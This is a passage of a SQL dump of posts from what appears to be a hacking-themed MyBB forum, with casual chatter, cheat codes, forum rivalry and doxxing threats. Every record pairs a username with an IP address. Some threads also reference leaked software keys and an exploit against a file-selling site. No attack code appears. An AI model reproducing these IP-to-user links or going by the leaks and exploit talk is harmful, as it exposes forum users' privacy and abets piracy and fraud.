('4160', '563', '2792', '25', 'RE: Virus Removal Tools', '0', '203', 'NeonLights', '1349887540', 'useless thread... waste of time lmao why did u even spend time doing this?', '205.237.34.10', '-840097270', '1', '0', '0', '0', '1', 'ab44d9c0b14a19c7a56386081ecf5820', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4074', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '61', 'NXK', '1349819910', 'Id like this also, It would be very nice :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '16dfc6ad60093e35701c5923d5a9094c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4075', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '61', 'NXK', '1349819941', 'You kind of can already, It displays what thread a user is looking at on there profile.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '975cf036c7c0b177393bf0974549e9c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4076', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '62', 'R?????zo?', '1349820655', 'nice share bro, too bad my internet connection sucks :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1c1191e706b4f8d10d0e9477d8e4974c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4077', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '3', '??????????¢™', '1349822208', 'Yes if you go to that users profile you can see next to where it says Online or Offline if its online it says the location they are so if they are viewing a thread it will say \"Viewing ........\" But if you are talkin about the feature where when you are on a thread it shows who is viewing that same thread on the top then that is useless. It will take up too much space and make it look tacky.', '75.38.19.52', '1260786484', '1', '0', '3', '1349822223', '1', '5b82cbd1657e9d7c25ddc6f7b27eb918', '0', '1349822223'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4078', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '3', '??????????¢™', '1349822503', 'Nice I will try this right now. EDIT: OMG This really works, Thanks 2nd Edit: LMAO this is what I got \"Instructions Thank you for purchasing my Ebay-Wallet 1.0 EBook. I uploaded the Instructions to uploadnsell and not the actual E-Book because i am aware that most of you know about the uploadnsell exploit. Anyway, now please just PM me your Transaction ID via a PM on HF or Contact me via Skype \"JayAargh\" I will reply to you shortly, Thank You :)\" Did anyone else get this?', '75.38.19.52', '1260786484', '1', '0', '3', '1349822640', '1', '09f4723b81684689a67aa9e3718f39bf', '0', '1349822640'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4079', '678', '3446', '29', 'RE: Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '3', '??????????¢™', '1349823195', 'Thanks for the E-Book but im not going to try it, too risky.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '4d76eae04096d672f5c2302385228be7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4080', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '100', '??zg???g????61', '1349823708', 'Lol oh crap two of my friends have messaged me like that already. xD', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '329ff6557282b4bfe5987a84da547804', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4082', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '3', '??????????¢™', '1349824153', 'Thanks for this, Keep it up', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '6012ffc8d48e7db53a6d995c64f4be18', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4083', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '246', 'The Anarchist', '1349824286', 'Honest to god, if he wants to use our forum, he\'s welcome to do so. I am not sure what I would \"use\" him for. It\'s just a forum, and I have no restrictions in place that would prevent him from doing so.', '177.142.119.28', '-1316063460', '0', '0', '0', '0', '1', '4d78a56d0cd6557c011214f8c70887b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4084', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '3', '??????????¢™', '1349824319', 'OMFG Anarchists you are a fucking skid and J0ker is a beast. You are just hating because we have more active members than your shitty as forum wiht the top poster of the day with 4 posts LMFAO.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '51d6430c6f5607c8c36962b07e8d66ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4085', '729', '4080', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349824404', '[quote=\'iTzGRONgamer61\' pid=\'4080\' dateline=\'1349823708\'] Lol oh crap two of my friends have messaged me like that already. xD [/quote] Yea one of my friends messaged me the legit virus but it said error or something and it said Skype removed it and my other friend sent me something like the virus but it was a gay as pick of a dude showing is dick.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '678957c8cb7673d4ea0363963fe26564', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4086', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '100', '??zg???g????61', '1349824446', 'Your welcome. You too buddy ;)', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'c2ce80c6474614726978f00f0e1463b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4087', '786', '0', '64', 'Awesome FREE site for watching latest anime and cartoons', '0', '100', '??zg???g????61', '1349824590', 'Hey guys, I just saw how much this section is lacking threads so, I thought I\'d share a website I use regularly for watching anime and other TV shows. The website is www.watchcartoononline.com and they offer anything from Deathnote to Family Guy.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '06aaf89196d50ed20c8cbc73abe32741', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4088', '747', '4081', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349824722', '[quote=\'t3h jok3r\' pid=\'4081\' dateline=\'1349824131\'] [quote=\'Ultimatum\' pid=\'4016\' dateline=\'1349764657\'] What the fuck is this? [A.Forums] is absolute bull shit. Just cause you guys don\'t have anything I\'ve seen here, doesn\'t give an excuse for you fucktards to go bringing your shit here. The fucking Anarchist kicked me from the forums for NO reason. At least t3h jok3r isn\'t an asshole. [/quote] 1. \"*Chuckles* The shit is still down. But I\'ll see what I can make up the 18 bucks and the 2 bucks I still ow yah Maybe from the booter, hopefully.\" 2. \"Got kicked out\" and your last post on AF was 8 hours this post? [quote=\'The Anarchist\' pid=\'4066\' dateline=\'1349812648\'] [quote=\'R?????zo?\' pid=\'4063\' dateline=\'1349811863\'] [quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\'] What an asshole! He banned me and posted my DOX too! [/quote] why do you even bother to make 300 accounts and get banned all the time? just GTFO of this forum and get a life. [/quote] I made maybe 3-4. It takes me less than a minute. Don\'t flatter yourself. As for posts? I\'ve spent maybe a total of 20-30 minutes posting here, mainly to highlight the owner\'s actions. It doesn\'t take much time out of my day, and it\'s really not that much activity. [/quote] This clearly shows that you are immature and have no life. If I posted your DOX online then firstly prove it that it\'s online and secondly prove it that I posted it. [/quote] I think you missed the fact he was joking. :roflol: As I said, don\'t flatter yourself. It only takes about 45 seconds to type a post like this. And why don\'t you post my DOX? You keep saying that you will, yet I am still waiting. It seems like that\'s all you can threaten. I honestly have no issues with people knowing who I am, after all, they are on my site. If people want to send me blow-up dolls or SWAT me, I invite them to. I will be surprised if the postal worker doesn\'t steal them. If you\'re going to make pathetic threats, follow through. It seems like you\'re all saddle and no horse. [hr] [quote=\'??????????¢™\' pid=\'4084\' dateline=\'1349824319\'] OMFG Anarchists you are a fucking skid and J0ker is a beast. You are just hating because we have more active members than your shitty as forum wiht the top poster of the day with 4 posts LMFAO. [/quote] Our top poster has 20 posts, actually.', '177.142.119.28', '-1316063460', '0', '0', '246', '1349824792', '1', '114088f08545073211f6ac7b488c66e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4089', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '62', 'R?????zo?', '1349824900', 'thanks for this bro, nice post :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'aa81f1535922df6d5d7c9971b17b85b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4090', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '100', '??zg???g????61', '1349825769', 'No problem ;D love to contribute', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '47bedb51736f0b8d05b5bd90ef5d461f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4091', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '222', 'Exposé', '1349825824', 'That is why you don\'t download random programs on the web. Half of the time they aren\'t what they say they are', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', '671c33e8837dcd584f7d9af0a979562c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4092', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '222', 'Exposé', '1349825983', 'Thanks for letting me join. Hopefully I can bring some good shit to the group :)', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', 'b5f6c7770f7f09dac4228ff7a5ac5e2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4093', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '222', 'Exposé', '1349826240', 'Yeh right :). It\'s easy to I stall so hopefully we can get it :)', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', '43420655ee44d8f140f4d0618ae1f2f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4094', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '222', 'Exposé', '1349826288', 'I\'m pretty sure it can go at the bottom but alright. It was just an idea :P', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', '930dff73d2a68cc9aa01c1cfba425645', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4095', '729', '4091', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349827057', '[quote=\'ƒ???????????g\' pid=\'4091\' dateline=\'1349825824\'] That is why you don\'t download random programs on the web. Half of the time they aren\'t what they say they are [/quote] Yea that is definitely right, it was a good thing that I knew about the virus or I would have clicked the link.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '579fa42f5775e993cb0a58fa9059c580', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4096', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '203', 'NeonLights', '1349828054', 'OMFG LOL MY CUZIN GOT THIS ON HES COMP i fixed for him within 2 secs lmao', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '51c04b0f5ece345b1d0b1966c2a4ee05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4097', '787', '0', '75', 'Saints Row The Third Cheats + More!', '0', '194', 'Slender Man', '1349828988', '[align=center][img]http://www.gamepur.com/files/images/2011/saints-row-the-third.jpg[/img][/align] [align=center][color=#9400D3]Cheat mode Press Back to use the phone, and select the \"Extras\" option, then choose the \"Cheats\" selection. Enter one of the following codes to activate the corresponding cheat function. Note: Achievements and auto save are disabled when cheats are activated. However, you are still allowed to manually save while cheats are enabled. Result Code Player Ability Money ($100,000) cheese Weapons letsrock Golden Gun (one-hit kills) goldengun Infinite sprint runfast No vehicle damage vroom Repair car repaircar Add respect whatitmeanstome Add police notoriety pissoffpigs No police notoriety goodygoody Add gang notoriety lolz No gang notoriety oops Vehicles Spawn Ambulance giveembulance Spawn Anchor giveanchor Spawn Attrazione giveattrazione Spawn Bootlegger givebootlegger Spawn Challenger givechallenger Spawn Commander givecommander Spawn Condor givecondor Spawn Eagle giveeagle Spawn Estrada giveestrada Spawn F69 Vtol givevtol Spawn Gatmobile givegatmobile Spawn Kanada givekanada Spawn Kenshin givekenshin Spawn Knoxville giveknoxville Spawn Krukov givekrukov Spawn Miami givemiami Spawn Municipal givemunicipal Spawn Nforcer givenforcer Spawn Peacemaker givepeacemaker Spawn Phoenix givephoenix Spawn Quasar givequasar Spawn Reaper givereaper Spawn Sandstorm givesandstorm Spawn Shark giveshark Spawn Specter givespecter Spawn Squasar givesquasar Spawn Status Quo givestatusquo Spawn Taxi givetaxi Spawn Titan givetitan Spawn Toad givetoad Spawn Tornado givetornado Spawn Vortex givevortex Spawn VTOL givevtol Spawn Vulture givevulture Spawn Widowmaker givewidowmaker Spawn Woodpecker givewoodpecker Weapons Spawn 45 Sheperd givesheperd Spawn Apocafists giveapoca Spawn AR 55 givear55 Spawn AS3 Ultimax giveultimax Spawn Baseball Bat givebaseball Spawn Chainsaw givechainsaw Spawn Cyber Blaster givecybersmg Spawn Cyber Buster givecyber Spawn D4TH Blossom giveblossom Spawn Electric Grenade giveelectric Spawn Flamethrower giveflamethrower Spawn Flash Bang giveflashbang Spawn Grave Digger givedigger Spawn Grenade givegrenade Spawn K-8 Krukov givekrukov Spawn KA-1 Kobra givekobra Spawn M2 Grenade Launcher givelauncher Spawn McManus 2015 givesniper Spawn Mini Gun giveminigun Spawn Molotov givemolotov Spawn Nocturne givesword Spawn RC Possesor givecgun Spawn Reaper Drone givedrone Spawn Riot Shield giveshield Spawn RPG Launcher giverpg Spawn S3X Hammer givehammer Spawn SA-3 Airstrike giveairstrike Spawn Satchel Charge givesatchel Spawn Shock Hammer giverocket Spawn Sonic Boom givesonic Spawn Stun Gun givestungun Spawn TEK Z-10 givetek Spawn The Penetrator givedildo Spawn Viper Laser Rifle giveslm8 Weather Sunny weather clearskies Cloudy weather overcast Rainy weather lightrain Very rainy weather heavyrain World Advance time ticktock Bloody Mess notrated Heaven Bound (corpses rise into the air) fryhole Vehicle Smash isquishyou Drunk (drunk pedestrians) dui Mascots (mascot pedestrians) mascot Pimps and Hos (pimps and prostitutes pedestrians) hohoho Zombies (zombie pedestrians) brains Customizing any vehicle To customize any non-customizable vehicle, take any customizable vehicle into Rim Jobs, and press Y. Go to \"Garage\" in the menu, and highlight a vehicle that is not customizable from your list, but do not press the button to retrieve it. Instead, press B to back out of the menu, and then select \"Accept\" to confirm the exit. It will now take you directly to the customizing menu. Easy money There are at least four barnstorming areas at the airport, one at the end of each runway where you have to stay in-between the runway approach light towers. You will get $5,108 for each pass with the longest at 446 feet. Each pass takes approximately 5 seconds in a helicopter, and another 10 to 20 seconds to line up again. You can easily get $100,000 in under 20 minutes. Repeat this as many times as desired. Finding the Eagle (Attack version) The special Attack version of the Eagle helicopter has dual pilot guided mini-guns and rocket pods. It can only be found on Armory Island at the southeast helipad (not the one on the roof). You must approach it from on the ground or be on the ground for a minute or two to get it to appear. Easter Bunny Go to Luchadores\' territory, and proceed to the lower left part of the map to find some boats. Get on the second boat to find a gang operation with a giant bunny caught in fishing nets. Professor Genki An NPC wearing a Professor Genki costume will appear at random in Steelport as an enemy on the radar. If you kill him, you will get approximately $300,000. Note: He has a very large amount of health and is armed with a stun gun. Shaundi in magazine Unlock Burns Hill Reactor as a crib, then go upstairs to the bathroom. Inside is a magazine on the edge of the Jacuzzi titled \"Boy-Toy\". The magazine\'s cover features Shaundi as she appeared in Playboy magazine\'s \"2008 Virtual Vixens\". The Punisher reference Once Kinzie Kensington\'s hideout is unlocked, go upstairs, and enter the room with all the computers in it. Then, zoom in on the ceiling with a sniper rifle to see a cluster of newspapers. They are all newspaper clippings from Volition\'s The Punisher game. Saints Row references Go to Kinzie Kensington\'s crib, then go upstairs. Go to the very back to find a room with newspaper clippings taped all over the wall. Look at the headlines to see references to Saints Row and Saints Row 2. There is one with a headline about a zombie attack with the map of Stillwater filled with red dots marking the spread of the outbreak. Avatar Awards Successfully complete the indicated task to unlock the corresponding Avatar Award: Oversized Gas Mask: Successfully complete the \"When Good Heists...\" mission. Saints Logo Shirt: Get the \"Flash The Pan\" achievement. SR:TT Logo Shirt: Create and upload your first character to the community site.[/align][/color]', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '02552884173c4c468bf8536462bdf677', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4098', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '1', 't3h jok3r', '1349829302', 'I tried installing it today but it threw me an error so I\'ll keep this thread opened for more updates.', '173.245.64.218', '-1376436006', '1', '0', '0', '0', '1', '0e309088e89419deff17bb5f799e843d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4099', '788', '0', '3', '4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1349829429', 'L33THacking reached 4,000 posts today. I will update this thread with a screenshot of the stats. Thanks a lot to everyone for contributing and L33THacking is grateful to all those who left L33THacking and played a role reaching 4K posts. [b]Edited[/b] [img]http://imageshack.us/a/img31/1636/statsue.png[/img]', '173.245.64.218', '-1376436006', '1', '0', '1', '1349829541', '1', 'e5d61c1b9c9a2c3c87c1f678eaadd2d8', '0', '1349829541'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4100', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '1', 't3h jok3r', '1349830062', 'Well I agree with IP and Flame. It will take up space, revealing privacy but at the same time fun to see who is viewing which thread.', '173.245.64.218', '-1376436006', '1', '0', '0', '0', '1', '0ef0b0c79462064db4390b1d61111679', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4101', '212', '4056', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349830179', '[quote=\'iTzIpod\' pid=\'4056\' dateline=\'1349810696\'] Warnings don\'t do anything. Nothing happens when you get 100%.. [/quote] On this site you get banned for 6 months.', '173.245.64.218', '-1376436006', '1', '0', '0', '0', '1', '0b26b7803267804b37ec733aedc480af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4102', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349830594', 'You are welcome bro, stay active :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '221e45f160e3cf33854f1270bf61eec8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4103', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '62', 'R?????zo?', '1349830625', 'okay cool, will be awesome if we get this :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'dcd0f911d51a557830a6a46d29511416', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4104', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '62', 'R?????zo?', '1349830684', 'congrats LH! and thanks everyone to everyone who posted, every single post counts :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cae26849bb05688f57e80624e7de6ca1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4105', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349831174', 'Ratters group added. The next group will be the last group for a while. I don\'t want too many groups.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c645a3b503d6f73c34b0797bfe5df99d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4111', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '61', 'NXK', '1349836812', 'Congrats to Us! This is awesome And I love this community!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1c8a4b4cafb626ee5c44c2e50029332b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4112', '778', '4022', '19', '[Junk]Gigbucks to Fiverr method', '0', '1', 't3h jok3r', '1349837710', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4113', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '205', 'mothered', '1349841999', 'A great achievement Indeed. It wasn\'t too long ago, when we were at 2,700 posts. Now 4k :) Let\'s keep up the good work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '3a745e01b934e09140a0f53facde114a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4114', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '205', 'mothered', '1349842085', 'I haven\'t come across this site before, so I\'ll certainly check It out. Many thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '835017bd3cbc37df725278cb8ad75e71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4115', '726', '3653', '13', 'RE: Dorks', '0', '205', 'mothered', '1349842227', 'Awesome, just what I was looking for. Appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd6d7c2eacd96981c8eb0acef264391aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4116', '712', '3639', '13', 'RE: SQL Injection Ebook', '0', '205', 'mothered', '1349842309', 'Hitting the download right now. Cheers mate, thanks :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '8d897de96cb9907cc5b79eeef2b4a5ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4117', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '2', 'Apathy', '1349842404', 'Thanks I will check it out tomorrow.', '173.206.130.147', '-1378975085', '0', '0', '0', '0', '1', 